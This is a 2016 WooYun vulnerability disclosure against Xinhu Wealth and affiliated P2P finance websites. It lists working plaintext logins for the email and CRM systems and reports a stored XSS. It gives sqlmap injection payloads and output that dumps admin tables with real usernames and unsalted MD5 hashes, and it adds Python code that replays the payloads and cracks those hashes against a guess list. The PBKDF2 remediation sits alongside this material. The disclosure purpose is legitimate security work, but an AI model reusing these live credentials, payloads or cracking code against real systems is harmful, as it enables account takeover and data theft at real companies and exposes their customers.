
P2P financial security: a bundle of vulnerabilities across the systems of Xinhu Wealth (新湖财富)

2016-01-16 22:00

http://**.**.**.**/

[Screenshots: 1.png, 2.png]



Proof of vulnerability:

1. Email

Working logins (username/password):
wangxia/wangxia123
lixin/lixin123


[Screenshots: 3.png, 4.png]



2. CRM system

Working logins (username/password):
yangbin/123456
liye/123456
wangyue/123456
liuyunping/123456



[Screenshots: 5.png, 6.png, 7.png]



3. Wealth Academy (财富学院)

http://**.**.**.**/home/shareDetail?id=215 : stored XSS (user-supplied content on the share detail page is rendered back without output encoding)

[Screenshot: 8.png]



4. Zhirui Investment (植瑞投资)

http://**.**.**.**/news.php?id=361

sqlmap output:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=361) AND 3118=3118 AND (5670=5670

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=-6199) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a7a7071,0x47536f5844736e70706d,0x7162627071),NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=361) AND (SELECT * FROM (SELECT(SLEEP(5)))mhNU) AND (4960=4960
---
web server operating system: Windows
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5.0.11
available databases [2]:
[*] information_schema
[*] zhirui
Database: zhirui
[7 tables]
+--------------------+
| zr_admin           |
| zr_article         |
| zr_diy             |
| zr_images          |
| zr_jingzhi_revenue |
| zr_menu            |
| zr_product         |
+--------------------+
Database: zhirui
Table: zr_admin
[4 entries]
+----+--------------------------+----------------------------------+-------------+-----------------+-----------------+-----------------+
| id | note                     | pass                             | user        | nickname        | authority       | authority_group |
+----+--------------------------+----------------------------------+-------------+-----------------+-----------------+-----------------+
| 5  | <blank>                  | 140e25f6e310653280672b421e7d6d49 | adminzhirui | Super admin     | 2,36,37,8,15,39 | <blank>         |
| 10 | common non-admin account | 13c24640e2d04040237a191b343a3100 | yunying     | Operations      | 2,8,15          | <blank>         |
| 11 | <blank>                  | 13c24640e2d04040237a191b343a3100 | touzi       | Investment dept | 2,39            | <blank>         |
| 12 | <blank>                  | d6b0ab7f1c8ab8f514db9a6d85de160a | chanpin     | Product dept    | 2,39            | <blank>         |
+----+--------------------------+----------------------------------+-------------+-----------------+-----------------+-----------------+
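The three sqlmap techniques above all come from a single defect: the id parameter is concatenated into the SQL inside parentheses, which is why every payload opens with `)` and closes with `(`. The following Python is an added example, not the site's code. It rebuilds that query pattern over a constructed in-memory SQLite table (table and column names are assumed), replays the report's boolean-based payload against a vulnerable and a parameterised lookup, and reproduces the NULL-counting step behind sqlmap's "8 columns" finding. SQLite has no `#` comment, so the UNION payloads here end in `--` instead.

```python
import sqlite3

# Constructed stand-in for the zr_article table seen in the dump; the real
# schema is not on the page, so column names are assumed.
ROWS = [(361, "article 361"), (362, "article 362")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE zr_article (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO zr_article VALUES (?, ?)", ROWS)
    return conn


def vulnerable_lookup(conn, raw_id):
    # The id is pasted into SQL inside parentheses, which is exactly what the
    # ")...(" prefix and suffix of sqlmap's payloads imply.
    sql = f"SELECT id, title FROM zr_article WHERE (id={raw_id})"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, raw_id):
    # Hardened form: reject non-numeric ids, then bind the value as a
    # parameter so the driver never treats it as SQL text.
    try:
        n = int(raw_id)
    except ValueError:
        return []
    return conn.execute("SELECT id, title FROM zr_article WHERE (id=?)", (n,)).fetchall()


# Boolean-based blind: the report's true-condition payload and a constructed
# false-condition twin. A leaky endpoint answers the two differently.
TRUE_PAYLOAD = "361) AND 3118=3118 AND (5670=5670"
FALSE_PAYLOAD = "361) AND 3118=3119 AND (5670=5670"


def has_boolean_oracle(conn, lookup):
    """True when the true/false payload pair yields different results."""
    return lookup(conn, TRUE_PAYLOAD) != lookup(conn, FALSE_PAYLOAD)


def find_union_columns(conn, lookup, max_cols=16):
    """How sqlmap arrives at '8 columns': keep adding NULLs to a UNION until
    the DBMS stops rejecting the mismatched column count and a row comes back.
    Returns None when no payload ever produces a row (the parameterised case)."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            rows = lookup(conn, f"-1) UNION ALL SELECT {nulls} --")
        except sqlite3.OperationalError:
            continue  # column-count mismatch: try one more NULL
        if rows:
            return n
    return None


def union_extract(conn, lookup, marker="qjzpq"):
    """UNION-inject a literal and check that it is reflected in the result,
    mirroring the CONCAT(0x..,0x..,0x..) marker trick in the dump above."""
    rows = lookup(conn, f"-1) UNION ALL SELECT NULL,'{marker}' --")
    return any(marker in str(row) for row in rows)


if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", vulnerable_lookup), ("parameterised", safe_lookup)):
        print(name, "boolean oracle:", has_boolean_oracle(db, fn),
              "union columns:", find_union_columns(db, fn),
              "marker reflected:", union_extract(db, fn))
```

The parameterised version returns nothing for every payload, so neither the boolean oracle nor the UNION column probe produces a signal; the integer coercion is a second, independent barrier that also stops the time-based payload from reaching the database at all.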



5. Zhixin Fund (植信基金)

http://**.**.**.**/product.php/detail?id=87

sqlmap output:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=87) AND 9452=9452 AND (7390=7390

    Type: UNION query
    Title: MySQL UNION query (NULL) - 14 columns
    Payload: id=-3884) UNION ALL SELECT NULL,NULL,CONCAT(0x7162717071,0x74454662534a4e707541,0x716b786271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
web server operating system: Windows
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
available databases [2]:
[*] information_schema
[*] zhixin
Database: zhixin
[6 tables]
+------------+
| zx_admin   |
| zx_article |
| zx_diy     |
| zx_images  |
| zx_menu    |
| zx_product |
+------------+
Database: zhixin
Table: zx_admin
[2 entries]
+----+--------------------------+----------------------------------+---------+-------------+--------------+-----------------+
| id | note                     | pass                             | user    | nickname    | authority    | authority_group |
+----+--------------------------+----------------------------------+---------+-------------+--------------+-----------------+
| 5  | <blank>                  | 140e25f6e310653280672b421e7d6d49 | admin   | Super admin | 2,36,37,8,15 | <blank>         |
| 10 | common non-admin account | e10adc3949ba59abbe56e057f20f883e | yunying | Operations  | 2,36,37,8,15 | <blank>         |
+----+--------------------------+----------------------------------+---------+-------------+--------------+-----------------+

Note on the admin tables: the pass column is a bare 32-hex MD5 with no salt. e10adc3949ba59abbe56e057f20f883e is the MD5 of "123456", and 140e25f6e310653280672b421e7d6d49 is shared by the super-admin accounts of both sites (adminzhirui and admin), so one recovered password opens both back ends.
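Sections 1, 2, 4 and 5 show the two halves of one password problem: logins that are a common password or the username plus "123", and unsalted MD5 in the admin tables. The Python below is an added example, not code from the report or from the sites. It flags the plaintext logins against a policy, tries the dumped hashes against a small constructed guess list (the wordlist and the username/site-derived candidate patterns are assumptions), and shows salted PBKDF2 as the storage-side fix.

```python
import hashlib
import hmac
import os

# Working plaintext logins the report lists for the mail and CRM systems.
PLAINTEXT_CREDS = [
    ("wangxia", "wangxia123"), ("lixin", "lixin123"),
    ("yangbin", "123456"), ("liye", "123456"),
    ("wangyue", "123456"), ("liuyunping", "123456"),
]

# (site, user, pass) from the zr_admin and zx_admin dumps: 32 hex chars, no salt.
DUMPED_HASHES = [
    ("zhirui", "adminzhirui", "140e25f6e310653280672b421e7d6d49"),
    ("zhirui", "yunying",     "13c24640e2d04040237a191b343a3100"),
    ("zhirui", "touzi",       "13c24640e2d04040237a191b343a3100"),
    ("zhirui", "chanpin",     "d6b0ab7f1c8ab8f514db9a6d85de160a"),
    ("zhixin", "admin",       "140e25f6e310653280672b421e7d6d49"),
    ("zhixin", "yunying",     "e10adc3949ba59abbe56e057f20f883e"),
]

# Constructed mini wordlist; a real audit would use a large breach list.
COMMON_PASSWORDS = ["123456", "123456789", "12345678", "111111", "password", "admin"]


def candidates(user, site=None):
    """Guesses an attacker tries first: common passwords plus user/site-derived ones."""
    stems = [user] + ([site] if site else [])
    out = list(COMMON_PASSWORDS)
    for s in stems:
        out += [s, s + "123", s + "1234", s + "123456", s + "@123", s + "2016"]
    return out


def weak_reason(user, password, site=None):
    """Why a plaintext password fails policy, or None if it passes these checks."""
    if password in COMMON_PASSWORDS:
        return "common password"
    if password.lower().startswith(user.lower()):
        return "derived from username"
    if site and site.lower() in password.lower():
        return "derived from site name"
    if len(password) < 12:
        return "shorter than 12 characters"
    return None


def crack_md5(user, md5hex, site=None):
    """Unsalted MD5 can be tested against guesses at memory speed; returns the
    recovered password, or None when no candidate matches."""
    for cand in candidates(user, site):
        if hashlib.md5(cand.encode()).hexdigest() == md5hex.lower():
            return cand
    return None


def audit():
    """Run both checks over the report's data; returns {account: finding}."""
    findings = {}
    for user, pw in PLAINTEXT_CREDS:
        findings[user] = weak_reason(user, pw)
    for site, user, h in DUMPED_HASHES:
        findings[f"{site}/{user}"] = crack_md5(user, h, site)
    return findings


# Storage-side fix chosen for this example (the sites' own code is not shown):
# a per-user random salt and a deliberately slow KDF instead of bare MD5.
def hash_password(password, salt=None, iterations=200_000):
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    _algo, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    for account, finding in audit().items():
        print(f"{account:20} {finding}")
```

Two things the dump alone shows even without cracking anything: yunying and touzi on the Zhirui site share a hash, and the super-admin hash is identical on both sites, which is only possible because nothing is salted. With PBKDF2 and a random salt, equal passwords stop producing equal stored values and each guess costs the attacker 200,000 iterations rather than one.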



6. Xinhu Wealth official site (新湖财富官网)

Injectable URLs:
http://**.**.**.**/news.php?id=209
http://**.**.**.**/news.php?t=1
http://**.**.**.**/product.php?pid=185
http://**.**.**.**/club.php?aid=105
http://**.**.**.**/product.php?cid=1
http://**.**.**.**/club.php?cid=1
http://**.**.**.**/branch.php?bid=5

sqlmap output:
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=209) AND 5874=5874 AND (2443=2443

    Type: UNION query
    Title: MySQL UNION query (NULL) - 8 columns
    Payload: id=-3235) UNION ALL SELECT NULL,NULL,CONCAT(0x7171706271,0x795353794d6443594851,0x717a626a71),NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=209) AND (SELECT * FROM (SELECT(SLEEP(5)))IjsN) AND (1818=1818
---
[10:45:20] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5.0.11
[10:45:20] [INFO] fetching database names
[10:45:21] [INFO] the SQL query used returns 2 entries
[10:45:21] [INFO] retrieved: information_schema
[10:45:21] [INFO] retrieved: xinhucaifu
available databases [2]:
[*] information_schema
[*] xinhucaifu
Database: xinhucaifu
[32 tables]
+--------------------------+
| xh_activity              |
| xh_admin                 |
| xh_adviser               |
| xh_article               |
| xh_article_type          |
| xh_branch                |
| xh_campus                |
| xh_club                  |
| xh_club_appointment      |
| xh_club_article          |
| xh_club_partner          |
| xh_club_slide            |
| xh_club_type             |
| xh_diy                   |
| xh_financial_appointment |
| xh_images                |
| xh_jingzhi_crm           |
| xh_jingzhi_revenue       |
| xh_job_apply             |
| xh_job_collect           |
| xh_member                |
| xh_menu                  |
| xh_message               |
| xh_notice                |
| xh_product               |
| xh_product_appointment   |
| xh_product_type          |
| xh_questionnaire         |
| xh_recruit               |
| xh_recruit_news          |
| xh_report                |
| xh_staff                 |
+--------------------------+
Database: xinhucaifu
Table: xh_admin
[7 entries]
+----+---------------------------------------------------------+----------------------------------+------------+------------------+-----------------------------------------------------------------------------------+-----------------+
| id | note                                                    | pass                             | user       | nickname         | authority                                                                         | authority_group |
+----+---------------------------------------------------------+----------------------------------+------------+------------------+-----------------------------------------------------------------------------------+-----------------+
| 5  | <blank>                                                 | 140e25f6e310653280672b421e7d6d49 | adminxinhu | Super admin      | 2,4,5,22,7,8,10,12,13,14,15,18,20,23,24,25,26,27,35,36,37,39,29,30,32,34,38,41,42 | <blank>         |
| 6  | Marketing dept; articles, branches, messages, marketing | 97dd6bb637e2f90e33b4b375f45ed8f9 | shichang   | Marketing dept   | 2,7,8,10,12,15,18,20,23,24,25,26,27                                               | <blank>         |
| 7  | Product dept; Ye Hang's team, homepage header cash info | 5a690d842935c51f26f473e025c1b97a | chanpin    | Product dept     | 2,32,34                                                                           | <blank>         |
| 8  | Customer service dept                                   | f3af840d8bd2e489635572d086af8425 | kefu       | Customer service | 2,4,5,22,13,15,34,38,41,42                                                        | <blank>         |
| 9  | HR dept, recruitment listings                           | d2b02d4575fd35a9e9fc034125f7c1c8 | renli      | HR / recruiting  | 2,15,35,36,37,39                                                                  | <blank>         |
| 10 | <blank>                                                 | 8b5a31ad65bd43a4808c745fdb82b9a5 | touzi      | Investment dept  | 2,34                                                                              | <blank>         |
| 11 | <blank>                                                 | 5a690d842935c51f26f473e025c1b97a | zhirui     | Zhirui Fund      | 2,32                                                                              | <blank>         |
+----+---------------------------------------------------------+----------------------------------+------------+------------------+-----------------------------------------------------------------------------------+-----------------+



7. Staff information query system

[Screenshot: 9.png]

Remediation:


Source: www.wooyun.org/bugs/wooyun-2016-0156431
